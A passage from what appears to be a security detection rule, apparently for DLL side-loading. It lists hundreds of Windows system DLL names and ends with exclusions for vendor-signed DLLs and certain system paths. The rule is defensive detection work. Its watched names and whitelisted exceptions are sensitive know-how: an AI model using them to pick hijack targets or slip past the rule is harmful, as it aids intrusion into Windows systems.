\"ndishc.dll\", \"ndproxystub.dll\", \"nduprov.dll\", \"negoexts.dll\", \"netapi32.dll\", \"netbios.dll\", \"netcenter.dll\", \"netcfgx.dll\", \"netcorehc.dll\", \"netdiagfx.dll\", \"netdriverinstall.dll\", \"netevent.dll\", \"netfxperf.dll\", \"neth.dll\", \"netid.dll\", \"netiohlp.dll\", \"netjoin.dll\", \"netlogon.dll\", \"netman.dll\", \"netmsg.dll\", \"netplwiz.dll\", \"netprofm.dll\", \"netprofmsvc.dll\", \"netprovfw.dll\", \"netprovisionsp.dll\", \"netsetupapi.dll\", \"netsetupengine.dll\", \"netsetupshim.dll\", \"netsetupsvc.dll\", \"netshell.dll\", \"nettrace.dll\", \"netutils.dll\", \"networkexplorer.dll\", \"networkhelper.dll\", \"networkicon.dll\", \"networkproxycsp.dll\", \"networkstatus.dll\", \"networkuxbroker.dll\", \"newdev.dll\", \"nfcradiomedia.dll\", \"ngccredprov.dll\", \"ngcctnr.dll\", \"ngcctnrsvc.dll\", \"ngcisoctnr.dll\", \"ngckeyenum.dll\", \"ngcksp.dll\", \"ngclocal.dll\", \"ngcpopkeysrv.dll\", \"ngcprocsp.dll\", \"ngcrecovery.dll\", \"ngcsvc.dll\", \"ngctasks.dll\", \"ninput.dll\", \"nlaapi.dll\", \"nlahc.dll\", \"nlasvc.dll\", \"nlhtml.dll\", \"nlmgp.dll\", \"nlmproxy.dll\", \"nlmsprep.dll\", \"nlsbres.dll\", \"nlsdata0000.dll\", \"nlsdata0009.dll\", \"nlsdl.dll\", \"nlslexicons0009.dll\", \"nmadirect.dll\", \"normaliz.dll\", \"npmproxy.dll\", \"npsm.dll\", \"nrpsrv.dll\", \"nshhttp.dll\", \"nshipsec.dll\", \"nshwfp.dll\", \"nsi.dll\", \"nsisvc.dll\", \"ntasn1.dll\", \"ntdll.dll\", \"ntdsapi.dll\", \"ntlanman.dll\", \"ntlanui2.dll\", \"ntlmshared.dll\", \"ntmarta.dll\", \"ntprint.dll\", \"ntshrui.dll\", \"ntvdm64.dll\", \"objsel.dll\", \"occache.dll\", \"ocsetapi.dll\", \"odbc32.dll\", \"odbcbcp.dll\", \"odbcconf.dll\", \"odbccp32.dll\", \"odbccr32.dll\", \"odbccu32.dll\", \"odbcint.dll\", \"odbctrac.dll\", \"oemlicense.dll\", \"offfilt.dll\", \"officecsp.dll\", \"offlinelsa.dll\", \"offlinesam.dll\", \"offreg.dll\", \"ole32.dll\", \"oleacc.dll\", \"oleacchooks.dll\", \"oleaccrc.dll\", \"oleaut32.dll\", \"oledlg.dll\", \"oleprn.dll\", 
\"omadmagent.dll\", \"omadmapi.dll\", \"onebackuphandler.dll\", \"onex.dll\", \"onexui.dll\", \"opcservices.dll\", \"opengl32.dll\", \"ortcengine.dll\", \"osbaseln.dll\", \"osksupport.dll\", \"osuninst.dll\", \"p2p.dll\", \"p2pgraph.dll\", \"p2pnetsh.dll\", \"p2psvc.dll\", \"packager.dll\", \"panmap.dll\", \"pautoenr.dll\", \"pcacli.dll\", \"pcadm.dll\", \"pcaevts.dll\", \"pcasvc.dll\", \"pcaui.dll\", \"pcpksp.dll\", \"pcsvdevice.dll\", \"pcwum.dll\", \"pcwutl.dll\", \"pdh.dll\", \"pdhui.dll\", \"peerdist.dll\", \"peerdistad.dll\", \"peerdistcleaner.dll\", \"peerdistsh.dll\", \"peerdistsvc.dll\", \"peopleapis.dll\", \"peopleband.dll\", \"perceptiondevice.dll\", \"perfctrs.dll\", \"perfdisk.dll\", \"perfnet.dll\", \"perfos.dll\", \"perfproc.dll\", \"perfts.dll\", \"phoneom.dll\", \"phoneproviders.dll\", \"phoneservice.dll\", \"phoneserviceres.dll\", \"phoneutil.dll\", \"phoneutilres.dll\", \"photowiz.dll\", \"pickerplatform.dll\", \"pid.dll\", \"pidgenx.dll\", \"pifmgr.dll\", \"pimstore.dll\", \"pkeyhelper.dll\", \"pktmonapi.dll\", \"pku2u.dll\", \"pla.dll\", \"playlistfolder.dll\", \"playsndsrv.dll\", \"playtodevice.dll\", \"playtomanager.dll\", \"playtomenu.dll\", \"playtoreceiver.dll\", \"ploptin.dll\", \"pmcsnap.dll\", \"pngfilt.dll\", \"pnidui.dll\", \"pnpclean.dll\", \"pnppolicy.dll\", \"pnpts.dll\", \"pnpui.dll\", \"pnpxassoc.dll\", \"pnpxassocprx.dll\", \"pnrpauto.dll\", \"pnrphc.dll\", \"pnrpnsp.dll\", \"pnrpsvc.dll\", \"policymanager.dll\", \"polstore.dll\", \"posetup.dll\", \"posyncservices.dll\", \"pots.dll\", \"powercpl.dll\", \"powrprof.dll\", \"ppcsnap.dll\", \"prauthproviders.dll\", \"prflbmsg.dll\", \"printui.dll\", \"printwsdahost.dll\", \"prm0009.dll\", \"prncache.dll\", \"prnfldr.dll\", \"prnntfy.dll\", \"prntvpt.dll\", \"profapi.dll\", \"profext.dll\", \"profprov.dll\", \"profsvc.dll\", \"profsvcext.dll\", \"propsys.dll\", \"provcore.dll\", \"provdatastore.dll\", \"provdiagnostics.dll\", \"provengine.dll\", \"provhandlers.dll\", 
\"provisioningcsp.dll\", \"provmigrate.dll\", \"provops.dll\", \"provplugineng.dll\", \"provsysprep.dll\", \"provthrd.dll\", \"proximitycommon.dll\", \"proximityservice.dll\", \"prvdmofcomp.dll\", \"psapi.dll\", \"pshed.dll\", \"psisdecd.dll\", \"psmsrv.dll\", \"pstask.dll\", \"pstorec.dll\", \"ptpprov.dll\", \"puiapi.dll\", \"puiobj.dll\", \"pushtoinstall.dll\", \"pwlauncher.dll\", \"pwrshplugin.dll\", \"pwsso.dll\", \"qasf.dll\", \"qcap.dll\", \"qdv.dll\", \"qdvd.dll\", \"qedit.dll\", \"qedwipes.dll\", \"qmgr.dll\", \"query.dll\", \"quiethours.dll\", \"qwave.dll\", \"racengn.dll\", \"racpldlg.dll\", \"radardt.dll\", \"radarrs.dll\", \"radcui.dll\", \"rasadhlp.dll\", \"rasapi32.dll\", \"rasauto.dll\", \"raschap.dll\", \"raschapext.dll\", \"rasctrs.dll\", \"rascustom.dll\", \"rasdiag.dll\", \"rasdlg.dll\", \"rasgcw.dll\", \"rasman.dll\", \"rasmans.dll\", \"rasmbmgr.dll\", \"rasmediamanager.dll\", \"rasmm.dll\", \"rasmontr.dll\", \"rasplap.dll\", \"rasppp.dll\", \"rastapi.dll\", \"rastls.dll\", \"rastlsext.dll\", \"rdbui.dll\", \"rdpbase.dll\", \"rdpcfgex.dll\", \"rdpcore.dll\", \"rdpcorets.dll\", \"rdpencom.dll\", \"rdpendp.dll\", \"rdpnano.dll\", \"rdpsaps.dll\", \"rdpserverbase.dll\", \"rdpsharercom.dll\", \"rdpudd.dll\", \"rdpviewerax.dll\", \"rdsappxhelper.dll\", \"rdsdwmdr.dll\", \"rdvvmtransport.dll\", \"rdxservice.dll\", \"rdxtaskfactory.dll\", \"reagent.dll\", \"reagenttask.dll\", \"recovery.dll\", \"regapi.dll\", \"regctrl.dll\", \"regidle.dll\", \"regsvc.dll\", \"reguwpapi.dll\", \"reinfo.dll\", \"remotepg.dll\", \"remotewipecsp.dll\", \"reportingcsp.dll\", \"resampledmo.dll\", \"resbparser.dll\", \"reseteng.dll\", \"resetengine.dll\", \"resetengonline.dll\", \"resourcemapper.dll\", \"resutils.dll\", \"rgb9rast.dll\", \"riched20.dll\", \"riched32.dll\", \"rjvmdmconfig.dll\", \"rmapi.dll\", \"rmclient.dll\", \"rnr20.dll\", \"roamingsecurity.dll\", \"rometadata.dll\", \"rotmgr.dll\", \"rpcepmap.dll\", \"rpchttp.dll\", \"rpcns4.dll\", \"rpcnsh.dll\", 
\"rpcrt4.dll\", \"rpcrtremote.dll\", \"rpcss.dll\", \"rsaenh.dll\", \"rshx32.dll\", \"rstrtmgr.dll\", \"rtffilt.dll\", \"rtm.dll\", \"rtmediaframe.dll\", \"rtmmvrortc.dll\", \"rtutils.dll\", \"rtworkq.dll\", \"rulebasedds.dll\", \"samcli.dll\", \"samlib.dll\", \"samsrv.dll\", \"sas.dll\", \"sbe.dll\", \"sbeio.dll\", \"sberes.dll\", \"sbservicetrigger.dll\", \"scansetting.dll\", \"scardbi.dll\", \"scarddlg.dll\", \"scardsvr.dll\", \"scavengeui.dll\", \"scdeviceenum.dll\", \"scecli.dll\", \"scesrv.dll\", \"schannel.dll\", \"schedcli.dll\", \"schedsvc.dll\", \"scksp.dll\", \"scripto.dll\", \"scrobj.dll\", \"scrptadm.dll\", \"scrrun.dll\", \"sdcpl.dll\", \"sdds.dll\", \"sdengin2.dll\", \"sdfhost.dll\", \"sdhcinst.dll\", \"sdiageng.dll\", \"sdiagprv.dll\", \"sdiagschd.dll\", \"sdohlp.dll\", \"sdrsvc.dll\", \"sdshext.dll\", \"searchfolder.dll\", \"sechost.dll\", \"seclogon.dll\", \"secproc.dll\", \"secproc_isv.dll\", \"secproc_ssp.dll\", \"secproc_ssp_isv.dll\", \"secur32.dll\", \"security.dll\", \"semgrps.dll\", \"semgrsvc.dll\", \"sendmail.dll\", \"sens.dll\", \"sensapi.dll\", \"sensorsapi.dll\", \"sensorscpl.dll\", \"sensorservice.dll\", \"sensorsnativeapi.dll\", \"sensorsutilsv2.dll\", \"sensrsvc.dll\", \"serialui.dll\", \"servicinguapi.dll\", \"serwvdrv.dll\", \"sessenv.dll\", \"setbcdlocale.dll\", \"settingmonitor.dll\", \"settingsync.dll\", \"settingsynccore.dll\", \"setupapi.dll\", \"setupcl.dll\", \"setupcln.dll\", \"setupetw.dll\", \"sfc.dll\", \"sfc_os.dll\", \"sgrmenclave.dll\", \"shacct.dll\", \"shacctprofile.dll\", \"sharedpccsp.dll\", \"sharedrealitysvc.dll\", \"sharehost.dll\", \"sharemediacpl.dll\", \"shcore.dll\", \"shdocvw.dll\", \"shell32.dll\", \"shellstyle.dll\", \"shfolder.dll\", \"shgina.dll\", \"shimeng.dll\", \"shimgvw.dll\", \"shlwapi.dll\", \"shpafact.dll\", \"shsetup.dll\", \"shsvcs.dll\", \"shunimpl.dll\", \"shutdownext.dll\", \"shutdownux.dll\", \"shwebsvc.dll\", \"signdrv.dll\", \"simauth.dll\", \"simcfg.dll\", \"skci.dll\", \"slc.dll\", 
\"slcext.dll\", \"slwga.dll\", \"smartscreenps.dll\", \"smbhelperclass.dll\", \"smbwmiv2.dll\", \"smiengine.dll\", \"smphost.dll\", \"smsroutersvc.dll\", \"sndvolsso.dll\", \"snmpapi.dll\", \"socialapis.dll\", \"softkbd.dll\", \"softpub.dll\", \"sortwindows61.dll\", \"sortwindows62.dll\", \"spacebridge.dll\", \"spacecontrol.dll\", \"spatializerapo.dll\", \"spatialstore.dll\", \"spbcd.dll\", \"speechpal.dll\", \"spfileq.dll\", \"spinf.dll\", \"spmpm.dll\", \"spnet.dll\", \"spoolss.dll\", \"spopk.dll\", \"spp.dll\", \"sppc.dll\", \"sppcext.dll\", \"sppcomapi.dll\", \"sppcommdlg.dll\", \"sppinst.dll\", \"sppnp.dll\", \"sppobjs.dll\", \"sppwinob.dll\", \"sppwmi.dll\", \"spwinsat.dll\", \"spwizeng.dll\", \"spwizimg.dll\", \"spwizres.dll\", \"spwmp.dll\", \"sqlsrv32.dll\", \"sqmapi.dll\", \"srchadmin.dll\", \"srclient.dll\", \"srcore.dll\", \"srevents.dll\", \"srh.dll\", \"srhelper.dll\", \"srm.dll\", \"srmclient.dll\", \"srmlib.dll\", \"srmscan.dll\", \"srmshell.dll\", \"srmstormod.dll\", \"srmtrace.dll\", \"srm_ps.dll\", \"srpapi.dll\", \"srrstr.dll\", \"srumapi.dll\", \"srumsvc.dll\", \"srvcli.dll\", \"srvsvc.dll\", \"srwmi.dll\", \"sscore.dll\", \"sscoreext.dll\", \"ssdm.dll\", \"ssdpapi.dll\", \"ssdpsrv.dll\", \"sspicli.dll\", \"sspisrv.dll\", \"ssshim.dll\", \"sstpsvc.dll\", \"starttiledata.dll\", \"startupscan.dll\", \"stclient.dll\", \"sti.dll\", \"sti_ci.dll\", \"stobject.dll\", \"storageusage.dll\", \"storagewmi.dll\", \"storewuauth.dll\", \"storprop.dll\", \"storsvc.dll\", \"streamci.dll\", \"structuredquery.dll\", \"sud.dll\", \"svf.dll\", \"svsvc.dll\", \"swprv.dll\", \"sxproxy.dll\", \"sxs.dll\", \"sxshared.dll\", \"sxssrv.dll\", \"sxsstore.dll\", \"synccenter.dll\", \"synccontroller.dll\", \"synchostps.dll\", \"syncproxy.dll\", \"syncreg.dll\", \"syncres.dll\", \"syncsettings.dll\", \"syncutil.dll\", \"sysclass.dll\", \"sysfxui.dll\", \"sysmain.dll\", \"sysntfy.dll\", \"syssetup.dll\", \"systemcpl.dll\", \"t2embed.dll\", \"tabbtn.dll\", \"tabbtnex.dll\", 
\"tabsvc.dll\", \"tapi3.dll\", \"tapi32.dll\", \"tapilua.dll\", \"tapimigplugin.dll\", \"tapiperf.dll\", \"tapisrv.dll\", \"tapisysprep.dll\", \"tapiui.dll\", \"taskapis.dll\", \"taskbarcpl.dll\", \"taskcomp.dll\", \"taskschd.dll\", \"taskschdps.dll\", \"tbauth.dll\", \"tbs.dll\", \"tcbloader.dll\", \"tcpipcfg.dll\", \"tcpmib.dll\", \"tcpmon.dll\", \"tcpmonui.dll\", \"tdh.dll\", \"tdlmigration.dll\", \"tellib.dll\", \"termmgr.dll\", \"termsrv.dll\", \"tetheringclient.dll\", \"tetheringmgr.dll\", \"tetheringservice.dll\", \"tetheringstation.dll\", \"textshaping.dll\", \"themecpl.dll\", \"themeservice.dll\", \"themeui.dll\", \"threadpoolwinrt.dll\", \"thumbcache.dll\", \"timebrokerclient.dll\", \"timebrokerserver.dll\", \"timesync.dll\", \"timesynctask.dll\", \"tlscsp.dll\", \"tokenbinding.dll\", \"tokenbroker.dll\", \"tokenbrokerui.dll\", \"tpmcertresources.dll\", \"tpmcompc.dll\", \"tpmtasks.dll\", \"tpmvsc.dll\", \"tquery.dll\", \"traffic.dll\", \"transportdsa.dll\", \"trie.dll\", \"trkwks.dll\", \"tsbyuv.dll\", \"tscfgwmi.dll\", \"tserrredir.dll\", \"tsf3gip.dll\", \"tsgqec.dll\", \"tsmf.dll\", \"tspkg.dll\", \"tspubwmi.dll\", \"tssessionux.dll\", \"tssrvlic.dll\", \"tsworkspace.dll\", \"ttdloader.dll\", \"ttdplm.dll\", \"ttdrecord.dll\", \"ttdrecordcpu.dll\", \"ttlsauth.dll\", \"ttlscfg.dll\", \"ttlsext.dll\", \"tvratings.dll\", \"twext.dll\", \"twinapi.dll\", \"twinui.dll\", \"txflog.dll\", \"txfw32.dll\", \"tzautoupdate.dll\", \"tzres.dll\", \"tzsyncres.dll\", \"ubpm.dll\", \"ucmhc.dll\", \"ucrtbase.dll\", \"ucrtbase_clr0400.dll\", \"ucrtbase_enclave.dll\", \"udhisapi.dll\", \"udwm.dll\", \"ueficsp.dll\", \"uexfat.dll\", \"ufat.dll\", \"uiamanager.dll\", \"uianimation.dll\", \"uiautomationcore.dll\", \"uicom.dll\", \"uireng.dll\", \"uiribbon.dll\", \"uiribbonres.dll\", \"ulib.dll\", \"umb.dll\", \"umdmxfrm.dll\", \"umpdc.dll\", \"umpnpmgr.dll\", \"umpo-overrides.dll\", \"umpo.dll\", \"umpoext.dll\", \"umpowmi.dll\", \"umrdp.dll\", \"unattend.dll\", 
\"unenrollhook.dll\", \"unimdmat.dll\", \"uniplat.dll\", \"unistore.dll\", \"untfs.dll\", \"updateagent.dll\", \"updatecsp.dll\", \"updatepolicy.dll\", \"upnp.dll\", \"upnphost.dll\", \"upshared.dll\", \"urefs.dll\", \"urefsv1.dll\", \"ureg.dll\", \"url.dll\", \"urlmon.dll\", \"usbcapi.dll\", \"usbceip.dll\", \"usbmon.dll\", \"usbperf.dll\", \"usbpmapi.dll\", \"usbtask.dll\", \"usbui.dll\", \"user32.dll\", \"usercpl.dll\", \"userdataservice.dll\", \"userdatatimeutil.dll\", \"userenv.dll\", \"userinitext.dll\", \"usermgr.dll\", \"usermgrcli.dll\", \"usermgrproxy.dll\", \"usoapi.dll\", \"usocoreps.dll\", \"usosvc.dll\", \"usp10.dll\", \"ustprov.dll\", \"utcutil.dll\", \"utildll.dll\", \"uudf.dll\", \"uvcmodel.dll\", \"uwfcfgmgmt.dll\", \"uwfcsp.dll\", \"uwfservicingapi.dll\", \"uxinit.dll\", \"uxlib.dll\", \"uxlibres.dll\", \"uxtheme.dll\", \"vac.dll\", \"van.dll\", \"vault.dll\", \"vaultcds.dll\", \"vaultcli.dll\", \"vaultroaming.dll\", \"vaultsvc.dll\", \"vbsapi.dll\", \"vbscript.dll\", \"vbssysprep.dll\", \"vcardparser.dll\", \"vdsbas.dll\", \"vdsdyn.dll\", \"vdsutil.dll\", \"vdsvd.dll\", \"vds_ps.dll\", \"verifier.dll\", \"version.dll\", \"vertdll.dll\", \"vfuprov.dll\", \"vfwwdm32.dll\", \"vhfum.dll\", \"vid.dll\", \"videohandlers.dll\", \"vidreszr.dll\", \"virtdisk.dll\", \"vmbuspipe.dll\", \"vmdevicehost.dll\", \"vmictimeprovider.dll\", \"vmrdvcore.dll\", \"voiprt.dll\", \"vpnike.dll\", \"vpnikeapi.dll\", \"vpnsohdesktop.dll\", \"vpnv2csp.dll\", \"vscmgrps.dll\", \"vssapi.dll\", \"vsstrace.dll\", \"vss_ps.dll\", \"w32time.dll\", \"w32topl.dll\", \"waasassessment.dll\", \"waasmediccapsule.dll\", \"waasmedicps.dll\", \"waasmedicsvc.dll\", \"wabsyncprovider.dll\", \"walletproxy.dll\", \"walletservice.dll\", \"wavemsp.dll\", \"wbemcomn.dll\", \"wbiosrvc.dll\", \"wci.dll\", \"wcimage.dll\", \"wcmapi.dll\", \"wcmcsp.dll\", \"wcmsvc.dll\", \"wcnapi.dll\", \"wcncsvc.dll\", \"wcneapauthproxy.dll\", \"wcneappeerproxy.dll\", \"wcnnetsh.dll\", \"wcnwiz.dll\", 
\"wc_storage.dll\", \"wdc.dll\", \"wdi.dll\", \"wdigest.dll\", \"wdscore.dll\", \"webauthn.dll\", \"webcamui.dll\", \"webcheck.dll\", \"webclnt.dll\", \"webio.dll\", \"webservices.dll\", \"websocket.dll\", \"wecapi.dll\", \"wecsvc.dll\", \"wephostsvc.dll\", \"wer.dll\", \"werconcpl.dll\", \"wercplsupport.dll\", \"werenc.dll\", \"weretw.dll\", \"wersvc.dll\", \"werui.dll\", \"wevtapi.dll\", \"wevtfwd.dll\", \"wevtsvc.dll\", \"wfapigp.dll\", \"wfdprov.dll\", \"wfdsconmgr.dll\", \"wfdsconmgrsvc.dll\", \"wfhc.dll\", \"whealogr.dll\", \"whhelper.dll\", \"wiaaut.dll\", \"wiadefui.dll\", \"wiadss.dll\", \"wiarpc.dll\", \"wiascanprofiles.dll\", \"wiaservc.dll\", \"wiashext.dll\", \"wiatrace.dll\", \"wificloudstore.dll\", \"wificonfigsp.dll\", \"wifidisplay.dll\", \"wimgapi.dll\", \"win32spl.dll\", \"win32u.dll\", \"winbio.dll\", \"winbiodatamodel.dll\", \"winbioext.dll\", \"winbrand.dll\", \"wincorlib.dll\", \"wincredprovider.dll\", \"wincredui.dll\", \"windowmanagement.dll\", \"windowscodecs.dll\", \"windowscodecsext.dll\", \"windowscodecsraw.dll\", \"windowsiotcsp.dll\", \"windowslivelogin.dll\", \"winethc.dll\", \"winhttp.dll\", \"winhttpcom.dll\", \"winhvemulation.dll\", \"winhvplatform.dll\", \"wininet.dll\", \"wininetlui.dll\", \"wininitext.dll\", \"winipcfile.dll\", \"winipcsecproc.dll\", \"winipsec.dll\", \"winlangdb.dll\", \"winlogonext.dll\", \"winmde.dll\", \"winml.dll\", \"winmm.dll\", \"winmmbase.dll\", \"winmsipc.dll\", \"winnlsres.dll\", \"winnsi.dll\", \"winreagent.dll\", \"winrnr.dll\", \"winrscmd.dll\", \"winrsmgr.dll\", \"winrssrv.dll\", \"winrttracing.dll\", \"winsatapi.dll\", \"winscard.dll\", \"winsetupui.dll\", \"winshfhc.dll\", \"winsku.dll\", \"winsockhc.dll\", \"winsqlite3.dll\", \"winsrpc.dll\", \"winsrv.dll\", \"winsrvext.dll\", \"winsta.dll\", \"winsync.dll\", \"winsyncmetastore.dll\", \"winsyncproviders.dll\", \"wintrust.dll\", \"wintypes.dll\", \"winusb.dll\", \"wirednetworkcsp.dll\", \"wisp.dll\", \"wkscli.dll\", \"wkspbrokerax.dll\", 
\"wksprtps.dll\", \"wkssvc.dll\", \"wlanapi.dll\", \"wlancfg.dll\", \"wlanconn.dll\", \"wlandlg.dll\", \"wlangpui.dll\", \"wlanhc.dll\", \"wlanhlp.dll\", \"wlanmediamanager.dll\", \"wlanmm.dll\", \"wlanmsm.dll\", \"wlanpref.dll\", \"wlanradiomanager.dll\", \"wlansec.dll\", \"wlansvc.dll\", \"wlansvcpal.dll\", \"wlanui.dll\", \"wlanutil.dll\", \"wldap32.dll\", \"wldp.dll\", \"wlgpclnt.dll\", \"wlidcli.dll\", \"wlidcredprov.dll\", \"wlidfdp.dll\", \"wlidnsp.dll\", \"wlidprov.dll\", \"wlidres.dll\", \"wlidsvc.dll\", \"wmadmod.dll\", \"wmadmoe.dll\", \"wmalfxgfxdsp.dll\", \"wmasf.dll\", \"wmcodecdspps.dll\", \"wmdmlog.dll\", \"wmdmps.dll\", \"wmdrmsdk.dll\", \"wmerror.dll\", \"wmi.dll\", \"wmiclnt.dll\", \"wmicmiplugin.dll\", \"wmidcom.dll\", \"wmidx.dll\", \"wmiprop.dll\", \"wmitomi.dll\", \"wmnetmgr.dll\", \"wmp.dll\", \"wmpdui.dll\", \"wmpdxm.dll\", \"wmpeffects.dll\", \"wmphoto.dll\", \"wmploc.dll\", \"wmpps.dll\", \"wmpshell.dll\", \"wmsgapi.dll\", \"wmspdmod.dll\", \"wmspdmoe.dll\", \"wmvcore.dll\", \"wmvdecod.dll\", \"wmvdspa.dll\", \"wmvencod.dll\", \"wmvsdecd.dll\", \"wmvsencd.dll\", \"wmvxencd.dll\", \"woftasks.dll\", \"wofutil.dll\", \"wordbreakers.dll\", \"workfoldersgpext.dll\", \"workfoldersres.dll\", \"workfoldersshell.dll\", \"workfolderssvc.dll\", \"wosc.dll\", \"wow64.dll\", \"wow64cpu.dll\", \"wow64win.dll\", \"wpbcreds.dll\", \"wpc.dll\", \"wpcapi.dll\", \"wpcdesktopmonsvc.dll\", \"wpcproxystubs.dll\", \"wpcrefreshtask.dll\", \"wpcwebfilter.dll\", \"wpdbusenum.dll\", \"wpdshext.dll\", \"wpdshserviceobj.dll\", \"wpdsp.dll\", \"wpd_ci.dll\", \"wpnapps.dll\", \"wpnclient.dll\", \"wpncore.dll\", \"wpninprc.dll\", \"wpnprv.dll\", \"wpnservice.dll\", \"wpnsruprov.dll\", \"wpnuserservice.dll\", \"wpportinglibrary.dll\", \"wpprecorderum.dll\", \"wptaskscheduler.dll\", \"wpx.dll\", \"ws2help.dll\", \"ws2_32.dll\", \"wscapi.dll\", \"wscinterop.dll\", \"wscisvif.dll\", \"wsclient.dll\", \"wscproxystub.dll\", \"wscsvc.dll\", \"wsdapi.dll\", \"wsdchngr.dll\", 
\"wsdprintproxy.dll\", \"wsdproviderutil.dll\", \"wsdscanproxy.dll\", \"wsecedit.dll\", \"wsepno.dll\", \"wshbth.dll\", \"wshcon.dll\", \"wshelper.dll\", \"wshext.dll\", \"wshhyperv.dll\", \"wship6.dll\", \"wshqos.dll\", \"wshrm.dll\", \"wshtcpip.dll\", \"wshunix.dll\", \"wslapi.dll\", \"wsmagent.dll\", \"wsmauto.dll\", \"wsmplpxy.dll\", \"wsmres.dll\", \"wsmsvc.dll\", \"wsmwmipl.dll\", \"wsnmp32.dll\", \"wsock32.dll\", \"wsplib.dll\", \"wsp_fs.dll\", \"wsp_health.dll\", \"wsp_sr.dll\", \"wtsapi32.dll\", \"wuapi.dll\", \"wuaueng.dll\", \"wuceffects.dll\", \"wudfcoinstaller.dll\", \"wudfplatform.dll\", \"wudfsmcclassext.dll\", \"wudfx.dll\", \"wudfx02000.dll\", \"wudriver.dll\", \"wups.dll\", \"wups2.dll\", \"wuuhext.dll\", \"wuuhosdeployment.dll\", \"wvc.dll\", \"wwaapi.dll\", \"wwaext.dll\", \"wwanapi.dll\", \"wwancfg.dll\", \"wwanhc.dll\", \"wwanprotdim.dll\", \"wwanradiomanager.dll\", \"wwansvc.dll\", \"wwapi.dll\", \"xamltilerender.dll\", \"xaudio2_8.dll\", \"xaudio2_9.dll\", \"xblauthmanager.dll\", \"xblgamesave.dll\", \"xblgamesaveext.dll\", \"xblgamesaveproxy.dll\", \"xboxgipsvc.dll\", \"xboxgipsynthetic.dll\", \"xboxnetapisvc.dll\", \"xinput1_4.dll\", \"xinput9_1_0.dll\", \"xinputuap.dll\", \"xmlfilter.dll\", \"xmllite.dll\", \"xmlprovi.dll\", \"xolehlp.dll\", \"xpsgdiconverter.dll\", \"xpsprint.dll\", \"xpspushlayer.dll\", \"xpsrasterservice.dll\", \"xpsservices.dll\", \"xwizards.dll\", \"xwreg.dll\", \"xwtpdui.dll\", \"xwtpw32.dll\", \"zipcontainer.dll\", \"zipfldr.dll\", \"bootsvc.dll\", \"halextintcpsedma.dll\", \"icsvcvss.dll\", \"ieproxydesktop.dll\", \"lsaadt.dll\", \"nlansp_c.dll\", \"nrtapi.dll\", \"opencl.dll\", \"pfclient.dll\", \"pnpdiag.dll\", \"prxyqry.dll\", \"rdpnanotransport.dll\", \"servicingcommon.dll\", \"sortwindows63.dll\", \"sstpcfg.dll\", \"tdhres.dll\", \"umpodev.dll\", \"utcapi.dll\", \"windlp.dll\", \"wow64base.dll\", \"wow64con.dll\", \"blbuires.dll\", \"bpainst.dll\", \"cbclient.dll\", \"certadm.dll\", \"certocm.dll\", 
\"certpick.dll\", \"csdeployres.dll\", \"dsdeployres.dll\", \"eapa3hst.dll\", \"eapacfg.dll\", \"eapahost.dll\", \"elsext.dll\", \"encdump.dll\", \"escmigplugin.dll\", \"fsclient.dll\", \"fsdeployres.dll\", \"fssminst.dll\", \"fssmres.dll\", \"fssprov.dll\", \"ipamapi.dll\", \"kpssvc.dll\", \"lbfoadminlib.dll\", \"mintdh.dll\", \"mmci.dll\", \"mmcico.dll\", \"mprsnap.dll\", \"mstsmhst.dll\", \"mstsmmc.dll\", \"muxinst.dll\", \"personax.dll\", \"rassfm.dll\", \"rasuser.dll\", \"rdmsinst.dll\", \"rdmsres.dll\", \"rtrfiltr.dll\", \"sacsvr.dll\", \"scrdenrl.dll\", \"sdclient.dll\", \"sharedstartmodel.dll\", \"smsrouter.dll\", \"spwizimg_svr.dll\", \"sqlcecompact40.dll\", \"sqlceoledb40.dll\", \"sqlceqp40.dll\", \"sqlcese40.dll\", \"srvmgrinst.dll\", \"svrmgrnc.dll\", \"tapisnap.dll\", \"tlsbrand.dll\", \"tsec.dll\", \"tsprop.dll\", \"tspubiconhelper.dll\", \"tssdjet.dll\", \"tsuserex.dll\", \"ualapi.dll\", \"ualsvc.dll\", \"umcres.dll\", \"updatehandlers.dll\", \"usocore.dll\", \"vssui.dll\", \"wsbappres.dll\", \"wsbonline.dll\", \"wsmselpl.dll\", \"wsmselrr.dll\", \"xpsfilt.dll\", \"xpsshhdr.dll\"\n ) and\n not (\n (\n dll.name : \"icuuc.dll\" and dll.code_signature.subject_name in (\n \"Valve\", \"Valve Corp.\", \"Avanquest Software (7270356 Canada Inc)\", \"Adobe Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : (\"timeSync.dll\", \"appInfo.dll\") and dll.code_signature.subject_name in (\n \"VMware Inc.\", \"VMware, Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : \"libcrypto.dll\" and dll.code_signature.subject_name in (\n \"NoMachine S.a.r.l.\", \"Bitdefender SRL\", \"Oculus VR, LLC\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : \"ucrtbase.dll\" and dll.code_signature.subject_name in (\n \"Proofpoint, Inc.\", \"Rapid7 LLC\", \"Eclipse.org Foundation, Inc.\", \"Amazon.com Services LLC\", \"Windows Phone\"\n ) and dll.code_signature.trusted == true\n ) or\n (dll.name : \"ICMP.dll\" and 
dll.code_signature.subject_name == \"Paessler AG\" and dll.code_signature.trusted == true) or\n (dll.name : \"kerberos.dll\" and dll.code_signature.subject_name == \"Bitdefender SRL\" and dll.code_signature.trusted == true) or\n (dll.name : \"dbghelp.dll\" and dll.code_signature.trusted == true) or\n (dll.name : \"DirectML.dll\" and dll.code_signature.subject_name == \"Adobe Inc.\" and dll.code_signature.trusted == true) or\n (\n dll.path : (\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\dxgi.dll\",\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\wincorlib.dll\",\n \"?:\\\\Windows\\\\dxgi.dll\"\n )\n )\n )\n",
